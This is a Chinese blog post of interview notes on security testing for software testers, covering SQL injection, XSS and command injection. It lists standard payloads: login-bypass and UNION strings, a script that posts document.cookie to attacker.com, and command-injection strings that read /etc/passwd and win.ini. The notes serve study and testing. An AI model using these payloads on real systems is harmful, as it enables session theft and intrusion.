测试面经--6.安全测试

原创 已于 2025-11-24 05:31:59 修改 · 403 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习

于 2025-11-19 04:02:51 首次发布

3种安全测试注入类笔记

一、SQL注入

  • 核心思想:通过用户输入改变SQL查询逻辑。
  • 示例说明:
    原SQL语句:
SELECT * FROM users WHERE username = '$username' AND password = '$password'; 
注入Payload: admin' OR '1'='1' -- 
注入后SQL: SELECT * FROM users WHERE username = 'admin' OR '1'='1' -- AND password = '$password'; 
效果:注释掉密码验证部分,查询出所有用户信息。
- 常用Payload:
- 身份认证绕过: admin'-- 、 ' OR '1'='1' -- 、 admin' # 、 ' OR 1=1 -- 、 admin' OR '1'='1' -- 
- 数据获取(联合查询): ' ORDER BY 10 -- 、 ' UNION SELECT 1,2,3,4,5 -- 、 ' UNION SELECT 1,database(),user(),version(),5 --

二、跨站脚本(XSS)

  • 核心思想:在用户输入中嵌入恶意脚本,在其他用户浏览器中执行。
  • 示例说明:
    正常场景:输入名字,返回 hello 名字 。
注入Payload: yoyo <img src=x onerror=alert(1)> 
效果:返回 hello yoyo 并弹出警示框,执行了嵌入的JS脚本。
- 测试步骤示例:
- 反射型XSS(搜索、URL参数):在输入框中输入 <script>alert('XSS')</script><img src=x onerror=alert(1)><svg onload=alert(1)> 
- 存储型XSS(评论、文章):输入 <script>fetch('https://attacker.com', {method: 'POST', body: document.cookie})</script><img>   <svg> 等标签Payload

三、命令注入

  • 核心思想:通过用户输入在服务器上执行未经授权的系统命令。
  • 示例说明:
    正常场景:执行 ping 命令,返回目标IP/域名的ping回复。
注入Payload: www.xxx.com & whoami 
效果:除了ping回复,还返回当前系统用户信息。
- 常用Payload:
- 基础命令分隔符: ; whoami 、 | whoami 、 & whoami 、 127.0.0.1 & whoami 
- 文件操作命令: ; cd / && ls -la (Linux)、 ; type C:\Windows\win.ini (Windows)、 ; echo 'hacked' > /tmp/test.txt 
- 空格和字符绕过: ; cat${IFS}/etc/passwd 、 ; cat%09/etc/passwd
测试--3.接口测试
Mostan727的博客
11-18 262
虽然接口测试覆盖了所有功能层的逻辑测试,但是跟前端界进行集成的时候,依然可能会出现问题,所以我们仍然需要进行所有功能在前端界测试验证;4,通过前端操作,有接口请求发送,请求参数无误,返回response没问题,那么就是前端在解析返回的 response时,解析出错了,就是前端的问题。2,通过前端操作,有接口请求发送,检查请求参数是否有问题。3,通过前端操作,有接口请求发送,请求参数无误,检查返response。非对称加密:加密用公钥,解密用私钥,效率低下,主要用途,密钥交换、数字签名、身份认证。
测试--2.app测试专项
最新发布
Mostan727的博客
11-18 228
ANR(Application Not responding),是指应用程序未响应,Android系统对于一些事件需要在一定的时间范围内完成,如果超过预定时间仍未能得到有效响应或者响应时间过长,都会造成ANR。1.主线程执行了耗时操作,比如数据库操作或网络编程2.其他进程(就是其他程序)占用CPU导致本进程得不到CPU时间片,比如其他进程的频繁读写操作可能会导致这个问题。
常见的安全测试漏洞
cs888zsy的博客
06-17 1504
SQL 注入攻击主要是由于程序员在开发过程中没有对客户端所传输到服务器端的参数进行严格的安全检查,同时 SQL 语句的执行引用了该参数,并且 SQL 语句采用字符串拼接的方式执行时,攻击者将可能在参数中插入恶意的 SQL 查询语句,导致服务器执行了该恶意 SQL 语句。
【网络安全经】2024届网络安全岗春招试题及试经验分享
Z4400840的博客
06-03 2011
事务是一组原子性的SQL语句或者说是一个独立的工作单元,如果数据库引擎能够成功对数据库应用这组SQL语句,那么就执行,如果其中有任何一条语句因为崩溃或其它原因无法执行,那么所有的语句都不会执行。也就是说,事务内的语句,要么全部执行成功,要么全部执行失败。举个银行应用的典型例子:假设银行的数据库有两张表:支票表和储蓄表,现在某个客户A要从其支票账户转移2000元到其储蓄账户,那么至少需求三个步骤:a.检查A的支票账户余额高于2000元;b.从A的支票账户余额中减去2000元;
网络安全、Web安全、渗透测试之笔经经总结(一)
weixin_30644369的博客
11-07 1723
本篇文章总结涉及以下几个方: 对称加密非对称加密? 什么是同源策略? cookie存在哪里?可以打开吗 xss如何盗取cookie? tcp、udp的区别及tcp三次握手,syn攻击? 证书要考哪些? DVWA是如何搭建的? 渗透测试的流程是什么 xss如何防御 IIS服务器应该做哪些方的保护措施: 虚拟机的几种连接方式及原理 xss有cookie一定可以无用户名密码登...
网络安全、Web安全、渗透测试之笔经经总结(非常详细)
2302_76672693的博客
12-25 864
网络安全、Web安全、渗透测试之笔经经总结(非常详细)
网络安全、Web安全、渗透测试之笔经经总结
2401_88751665的博客
01-13 937
本篇文章涉及的知识点有如下几方: 1.什么是WebShell? 2.什么是网络钓鱼? 3.你获取网络安全知识途径有哪些? 4.什么是CC攻击? 5.Web服务器被入侵后,怎样进行排查? 6.dll文件是什么意思,有什么用?DLL劫持原理 7.0day漏洞 8.Rootkit是什么意思 9.蜜罐 10.ssh 11.DDOS 12.震网病毒: 13.一句话木马 14.Https的作用 15.手工查找后门木马的小技巧
shopee测试工程师经详细整理+答案.pdf
03-15
测试工程师是软件开发流程中的一个重要角色,主要负责对软件进行系统性检验,以确保软件产品的质量达到预定标准。...文件中提到的经和答案整理反映了实际试中可能遇到的各类问题,为求职者提供了宝贵的参考。
20届-测试-华为OD
2401_86909848的博客
09-28 981
摘要:本文分享了一位20届本科生成功斩获测试岗offer的求职历程。从5月到7月,经历了算法学习、机试、技术、HR和综合试等环节。重点包括:1)刷题阶段以力扣为主,辅以真题练习;2)机试出现原题但未刷透的教训;3)技术试围绕项目深度提问,涉及测试流程、工具使用及现场编码;4)HR和综合试侧重个人规划、团队协作等软技能。作者特别感谢指导人"栗栗"的专业帮助,强调针对性准备和资源引导的重要性。整个流程历时两个月,最终顺利收获offer。
精选资源
Java-百度准入职老哥整理(八股文)
06-29
Java试是每位求职者在进入IT行业,尤其是大型互联网公司如百度时必须...对于“Java-百度准入职老哥整理(八股文之四).pdf”这样的资料,建议仔细阅读,模拟试场景进行自我测试,以便更好地应对真实的试挑战。
笔试题————1、网络安全、Web安全、渗透测试笔试总结
热门推荐
Fly_鹏程万里
05-13 4万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 本篇文章主要涉及一下几个方: 对称加密非对称加密? 什么是同源策略? cookie存在哪里?可以打开吗 xss如何盗取cookie? tcp、udp的区别及tcp三次...
深信服的安全测试
weixin_37846736的博客
05-26 2927
深信服的试应该是我所有试里边试的次数最多的了,一共了两个岗位,6次。第一次报的安全测试岗,到三部门负责的大佬的时候发现他们想要的是那种渗透工程师,就是能挖漏洞能搞ctf的人才,大佬很仁慈的劝我换个岗位,然后就换到了测试开发岗,然后又是到了部门负责人的时候挂掉了。下附上凉经,提供给以后有需要的人吧 安全测试岗: 1 中间人攻击的流程以及防御方法 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者
2017深信服校招笔经经 软件测试工程师
夏小凰的博客
11-14 4046
技术 1V1 无须自我介绍 1.介绍一下项目经验,重点提问项目中遇到的困难以及解决。 2.数据库知识。有A,B两张有关联的表,删除B表中与A无关的数据。手写SQL语句。 3.手写单例模式代码,并简述。 4.对互联网安全,云等的了解。 (这个不太了解也没关系,了解加分) 5.如何判断一个网页的加载速度。 (httpwatch) 6.对linux的了解。在linux环境
测试-安全测试
m0_38082334的博客
04-10 4158
测试-安全测试
安全测试试常见客观题怎么回答?
ysxjy2020的博客
01-04 3481
一、安全测试的好处? 如果黑客利用了系统安全漏洞,对系统进行攻击导致而成,从而导致损失的代价也是不言而喻的。安全测试的好处有如下几个方: 提升产品的安全质量; 尽量在发布前找到安全问题予以修补降低成本; 度量安全等级(安全测试和找bug一样,我们不可能把系统所有的安全问题都能找到并解决,通过安全测试,我们可以大体的估计系统的安全等级); 验证安装在系统内的保护机制能否在实际应用中对系统进行保护,使之不被非法入侵,不受各种因素的干扰。 二、安全测试能发现哪些问题? 安全测试是建立在功能测试
安全服务(渗透测试)实习
qq_44768719的博客
05-24 1837
算是给大家分享一下我的遭遇,目前只拿了绿盟的offer 首先接到了知道创宇的电话,试时长30分钟,我尽量把我想起来的都说出来 1.你知道sql注入有哪些,如何判断sql注入 2.二次注入的原理 3.sqlmap怎么写shell,除了sqlmap还能怎么写shell 4.xxe漏洞原理,除了html语言之外,还有其他的语言吗 5.文件上传漏洞,绕过,如果所有的函数都写死,怎么上传 6.渗透测试的流程 7.这些信息收集的步骤都有什么用 8.解析漏洞 9.中间件漏洞 10.xss绕过 还一些零零碎碎的忘了.
关于安全测试试的30道基础概念题目
梅森上校的博客 业精于勤荒于嬉,形成于思毁于随。
12-16 1万+
关于安全测试试的30道基础概念题目   看看这些试题目,目的是了解安全测试的基本概念。每一道题目都可以展开到一定的深度和广度。 这里仅仅是一个抛砖引玉,点到为止。 Question 1. 什么是安全测试(Security Testing)? 在所有类型的软件测试中,安全测试可以被认为是最重要的。其主要目的是在任何软件(Web或基于网络)的应用程序中找到漏洞,并保护其数据免受可能的攻击...
网络安全、Web安全、渗透测试之笔经经总结(三)
weixin_30892987的博客
03-21 2167
本篇文章涉及的知识点有如下几方: 1.什么是WebShell? 2.什么是网络钓鱼? 3.你获取网络安全知识途径有哪些? 4.什么是CC攻击? 5.Web服务器被入侵后,怎样进行排查? 6.dll文件是什么意思,有什么用?DLL劫持原理 7.0day漏洞 8.Rootkit是什么意思 9.蜜罐 10.ssh ...
京东测试开发
05-29
在设计测试用例时,除了对整体流程和功能进行关注外,还需要特别注意强度测试、性能测试、压力测试、边界值测试、稳定性测试以及安全性测试等多个方[^1]。测试用例的基本要素包括输入、输出、操作和测试环境。此外...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

奶茶精Gaaa

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值